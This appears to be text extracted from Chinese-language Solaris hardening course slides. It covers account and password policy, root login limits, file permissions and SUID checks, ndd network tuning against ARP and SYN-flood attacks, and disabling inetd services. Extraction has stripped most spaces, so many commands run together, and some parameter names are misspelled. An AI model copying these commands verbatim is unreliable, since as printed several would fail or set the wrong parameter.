補(bǔ)丁下載地址：/pub-cgi/show.pl?target=patches/patch-access&nav=patchpageSolaris系統(tǒng)安全配置asetSecuritylevelstasksReportsAsetfilesConfigurationSecuritylevelsLowMediumhightasksSystemfilespermissionsverficationSystemfilescheckUser/groupcheckSystemconfigurationfilescheckEnvironmentcheckEepromcheckFirewallsetupReports/usr/aset/reports

/usr/aset/aset–n通過(guò)郵件把報(bào)表發(fā)送給其他人AsetfilesMasterfilesTunefilesUid_aliasesfilesChecklistfilesEnvironmentfilesConfigurationChoosewhichtaskstorunSpecifydirectoriesforchecklisttasksScheduleexecutionSolaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號(hào)和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全禁用和刪除不必要的帳號(hào)sys、uucp、nuucp、listen、lp、adm簡(jiǎn)單的辦法是在/etc/shadow的password域前加NP。Passwd

－luser1刪除賬號(hào)#userdeluser1Solaris系統(tǒng)帳號(hào)安全練習(xí)8、9Solaris系統(tǒng)帳號(hào)安全強(qiáng)迫用戶(hù)修改密碼

passwd–fusername禁止用戶(hù)修改密碼

Passwd–n10–x7username設(shè)置用戶(hù)的期限Useradd–e12/25/99username

Solaris系統(tǒng)帳號(hào)安全創(chuàng)建var/adm/loginlog

記錄登陸過(guò)程設(shè)置chmod600/var/adm/loginlogChownsys/var/adm/loginlogRoot帳號(hào)安全性確保root只允許從控制臺(tái)登陸限制知道root口令的人數(shù)使用強(qiáng)壯的密碼三個(gè)月或者當(dāng)有人離開(kāi)公司是就更改一次密碼使用普通用戶(hù)登陸,用su取得root權(quán)限,而不是以root身份登錄Solaris系統(tǒng)帳號(hào)安全Root帳號(hào)安全性設(shè)置umask

為077,在需要時(shí)再改回022請(qǐng)使用全路徑執(zhí)行命令不要允許有非root用戶(hù)可寫(xiě)的目錄存在root的路徑里Solaris9系統(tǒng)默認(rèn)禁止root只能從console登陸Solaris系統(tǒng)帳號(hào)安全監(jiān)控用戶(hù)su過(guò)程在/etc/default/su里Uncomment

sulog=/var/adm/sulogconsole=/dev/console用的su過(guò)程可以在控制臺(tái)上顯示禁止root用戶(hù)遠(yuǎn)程登錄編輯/etc/default/login文件，添加 CONSOLE=/dev/null禁止root遠(yuǎn)程FTP登錄在/etc/ftpusers里加上root。在SSH

配置文件加：permitRootLogin

=

noSolaris系統(tǒng)帳號(hào)安全Solaris系統(tǒng)帳號(hào)安全記錄用戶(hù)未成功登陸系統(tǒng)的日志

/var/adm/loginlog?touch/var/adm/loginlog限制登陸shell/usr/lib/rsh

用戶(hù)被限制在自己的目錄下用戶(hù)只能使用PATH路徑下的命令不能使用重定向輸出符Solaris帳號(hào)口令安全設(shè)置密碼策略編輯“/etc/default/passwd”

修改MAXWEEKS=4

口令至少每隔4星期更改一次

修改MINWEEKS=1口令至多每隔1星期更改一次

添加WARNWEEKS=3修改口令后第三個(gè)星期會(huì)收到快要修改口令的信息

修改PASSLENGTH=6用戶(hù)口令長(zhǎng)度不少于6個(gè)字符實(shí)驗(yàn)4Solaris帳號(hào)口令安全設(shè)置sysadmin組口令刪除sysadmin組內(nèi)不重要用戶(hù)禁用User用戶(hù)練習(xí)Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號(hào)和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全ls–altestdrwxr-xr-x3rootroot1024Sep1311:58test模式位通常由一列10個(gè)字符來(lái)表示，每個(gè)字符表示一個(gè)模式設(shè)置1:表示文件類(lèi)型。d表示目錄，-表示普通文件，l表示鏈接文件等等

每個(gè)文件和目錄有三組權(quán)限，一組是文件的擁有者、一組是文件所屬組的成員、一組是其他所有用戶(hù)。

"r"表示可讀，"w"表示可寫(xiě)，"x"表示可執(zhí)行。一共9位(每組3位)，合起來(lái)稱(chēng)為模式位(modebits)Solaris文件系統(tǒng)的安全Solaris文件系統(tǒng)的安全Chmod

改變文檔或目錄之屬性。如#chmod755testChown改變文檔或目錄之擁有權(quán)#chownuser1file1;chown-Ruser1dir1Chgrp改變文檔或目錄之群組擁有權(quán)

#chgrp

group1

file1Solaris文件系統(tǒng)的安全SUID/SGIDSUID表示"設(shè)置用戶(hù)ID“;SGID表示"設(shè)置組ID"。當(dāng)用戶(hù)執(zhí)行一個(gè)SUID文件時(shí)，用戶(hù)ID在程序運(yùn)行過(guò)程中被置為文件擁有者的用戶(hù)ID。如果文件屬于root，那用戶(hù)就成為超級(jí)用戶(hù)。SUID程序代表了重要的安全漏洞，特別是SUID設(shè)為root的程序。Solaris文件系統(tǒng)的安全SUID/SGID

#find/-perm-4000-ls

find列出所有設(shè)置了SUID（“4000”）或SGID（“2000”）位的普通文件（“f”）。

chmoda-s<文件名>”移去相應(yīng)文件的“s”位。實(shí)驗(yàn)6Solaris文件系統(tǒng)的安全設(shè)置系統(tǒng)的粘貼位

chmod1755files

ls–l/var/mail

drwxrwxrwt…….MailSolaris文件系統(tǒng)的安全限制/etc下文件的使用

find/etc/-typef–perm–g+w–print(查找組可寫(xiě)文件）

find/etc/-typef–perm–o+w–print

（查找其他用戶(hù)可寫(xiě)文件）

chmod–Rgo-w/etc

（改變?nèi)魏五e(cuò)誤的組/其他用戶(hù)的寫(xiě)權(quán)限）

Solaris文件系統(tǒng)的安全加密文件

cryptkey<clearfile>encryptedfilecryptkey<encryptedfile

Solaris文件系統(tǒng)安全備份命令cp—雖然常用來(lái)拷貝單獨(dú)一個(gè)文件，但cp（copy）命令支持一個(gè)遞歸選項(xiàng)（-R）來(lái)拷貝一個(gè)目錄和它里面所有的文件和子目錄。例如把mydir中所有內(nèi)容拷貝到mydir2中：cp-Rmydirmydir2。tar—tar（TApe

aRchiver）命令可以創(chuàng)建、把文件添加到或從一個(gè)tar檔案（或“tar文件”）中解開(kāi)文件。cpio—這個(gè)SVR4和GNU工具把文件拷貝進(jìn)或拷貝出一個(gè)cpio或tar檔案。與tar相似。

練習(xí)找出系統(tǒng)中的setuid,setgid,sticky文件Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號(hào)和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全日常異常檢測(cè)和維護(hù)系統(tǒng)資源的監(jiān)控進(jìn)程內(nèi)存磁盤(pán)進(jìn)程結(jié)構(gòu)ProcessKernelthreadUserlwp查看進(jìn)程Ps–ef

Ps–ecl

進(jìn)程的優(yōu)先級(jí)別Real-timeSystemprocessesTimesharingprocessesInteractiveprocesses修改進(jìn)程的優(yōu)先級(jí)別Nice(nice+4or-10command)Priocntl

priocntl–e–cRT–t500–p20結(jié)束重啟進(jìn)程KillpidKill-9pidKill-HUPpid系統(tǒng)性能檢測(cè)Sac/usr/bin/sacSadc/usr/lib/sa/sadc系統(tǒng)性能檢測(cè)VmstatIostat–xtcDf

網(wǎng)絡(luò)性能監(jiān)測(cè)PingSpraySnoopNetstatnfsstat啟動(dòng)網(wǎng)絡(luò)參數(shù)設(shè)定設(shè)置/etc/init.d/inetinit文件在系統(tǒng)作為路由器的情況中執(zhí)行

#ndd–set/dev/ip

ip_forwarding1關(guān)閉數(shù)據(jù)包轉(zhuǎn)發(fā)

#ndd–set/dev/ip

ip_forwarding0(或/etc/notrouter)忽略重定向數(shù)據(jù)包（否則有遭到DOS的隱患）

#ndd–set/dev/ip

ip_ignore_redirects1

不發(fā)送重定向數(shù)據(jù)包

#ndd–set/dev/ip

ip_send_redirects0禁止轉(zhuǎn)發(fā)定向廣播

#ndd–set/dev/ip

ip_forward_directed_broadcasts0禁止轉(zhuǎn)發(fā)在數(shù)據(jù)源設(shè)置了路由的數(shù)據(jù)包

#ndd–set/dev/ip

ip_forward_src_routed0啟動(dòng)網(wǎng)絡(luò)參數(shù)設(shè)定ICMP協(xié)議參數(shù)設(shè)置/etc/init.d/inetinit文件關(guān)閉響應(yīng)echo廣播

＃ndd–set/dev/ip

ip_respond_to_echo_boadcast0關(guān)閉響應(yīng)時(shí)間戳廣播

#ndd–set/dev/ip

ip_respond_to_timestamp_broadcast0關(guān)閉地址掩碼廣播

#ndd–set/dev/ip

ip_respind_to_address_mask_broadcast0ARP攻擊防止減少過(guò)期時(shí)間#ndd–set/dev/arp

arp_cleanup_interval60000#ndd-set/dev/ip

ip_ire_flush_interval60000默認(rèn)是300000毫秒（5分鐘）加快過(guò)期時(shí)間，并不能避免攻擊，但是使得攻擊更加困難，帶來(lái)的影響是在網(wǎng)絡(luò)中會(huì)大量的出現(xiàn)ARP請(qǐng)求和回復(fù)請(qǐng)不要在繁忙的網(wǎng)絡(luò)上使用。ARP攻擊防止建立靜態(tài)ARP使用arp–ffilename加載如下文件

08:00:20:ba:a1:f2

08:00:20:ee:de:1f

這是一種很有效的方法，而且對(duì)系統(tǒng)影響不大。缺點(diǎn)是破壞了動(dòng)態(tài)ARP協(xié)議禁止ARPifconfiginterface–arp

網(wǎng)卡不會(huì)發(fā)送ARP和接受ARP包。但是使用前提是使用靜態(tài)的ARP表，如果不在apr表中的計(jì)算機(jī)，將不能通信TCP協(xié)議參數(shù)Synflood（半開(kāi)式連接攻擊）SYNFLOOD原理 請(qǐng)求方

服務(wù)方

>

發(fā)送

SYN消息

回應(yīng)

SYN-ACK

<

>

ACK

ndd–set/dev/tcptcp_conn_req_max_q04096默認(rèn)連接數(shù)為1024連接耗盡攻擊ndd–set/dev/tcp

tcp_conn_req_max_q1024默認(rèn)連接數(shù)為128防止TCP序列號(hào)預(yù)測(cè)攻擊(ip欺騙)建議在/etc/default/inetinit中增加如下的生成初始化序列號(hào)設(shè)置來(lái)防止TCP序列號(hào)預(yù)測(cè)攻擊(ip欺騙):TCP_STRONG_ISS=2

TCP協(xié)議參數(shù)堆棧緩沖區(qū)溢出禁止堆棧緩沖區(qū)溢出在/etc/system里加上如下語(yǔ)句，禁止緩沖溢出：

echo

"set

noexec_user_stack=1"

>>

/etc/system

echo

"set

noexec_user_stack_log=1"

>>

/etc/system

Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號(hào)和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全日常異常檢測(cè)和維護(hù)Solaris系統(tǒng)及網(wǎng)絡(luò)服務(wù)/etc/inet/inetd.conf/etc/inet/inetd.conf決定inetd啟動(dòng)網(wǎng)絡(luò)服務(wù)時(shí)，啟動(dòng)哪些服務(wù)，用什么命令啟動(dòng)這些服務(wù)，以及這些服務(wù)的相關(guān)信息

/etc/service/etc/services文件記錄一些常用的接口及其所提供的服務(wù)的對(duì)應(yīng)關(guān)系。

/etc/protocols/etc/protocols文件記錄協(xié)議名及其端口的關(guān)系。/etc/Rc*.d/etc/inittab

inittab定義了系統(tǒng)缺省運(yùn)行級(jí)別，系統(tǒng)進(jìn)入新運(yùn)行級(jí)別需要做什么Inetd服務(wù)#more/etc/inetd.conf#systatstreamtcp

nowaitroot/usr/bin/ps

ps-ef#系統(tǒng)進(jìn)程監(jiān)控服務(wù)，允許遠(yuǎn)程察看進(jìn)程#netstatstreamtcp

nowaitroot/usr/bin/netstat

netstat-finet#網(wǎng)絡(luò)狀態(tài)監(jiān)控服務(wù)，允許遠(yuǎn)程察看網(wǎng)絡(luò)狀態(tài)#timestreamtcp6nowaitrootinternal#timedgramudp6waitrootinternal#網(wǎng)絡(luò)時(shí)間服務(wù)，允許遠(yuǎn)程察看系統(tǒng)時(shí)間#echostreamtcp6nowaitrootinternal#echodgramudp6waitrootinternal#網(wǎng)絡(luò)測(cè)試服務(wù)，回顯字符串Inetd服務(wù)#namedgram

udpwaitroot/usr/sbin/in.tnamed

in.tnamed#named，DNS服務(wù)器#telnetstreamtcp6nowaitroot/usr/sbin/in.telnetd

in.telnetd#telnet服務(wù)器#ftpstreamtcp6nowaitroot/usr/sbin/in.ftpd

in.ftpd-a#ftp服務(wù)器/etc/servicesMore/etc/services#Networkservices,Internetstyle#tcpmux1/tcpecho7/tcpecho7/udpdiscard9/tcpsinknulldiscard9/udpsinknullsystat11/tcpusersdaytime13/tcpdaytime13/udpnetstat15/tcpSolaris系統(tǒng)服務(wù)安全在inetd.conf中關(guān)閉不用的服務(wù)

#cp/etc/inet/inetd.conf/etc/inet/inetd.conf.bak然后用vi編輯器編輯inetd.conf文件，對(duì)于需要注釋掉的服務(wù)在相應(yīng)行開(kāi)頭標(biāo)記“#”字符即可。注:Ftp和Telnet服務(wù)在不需要時(shí)也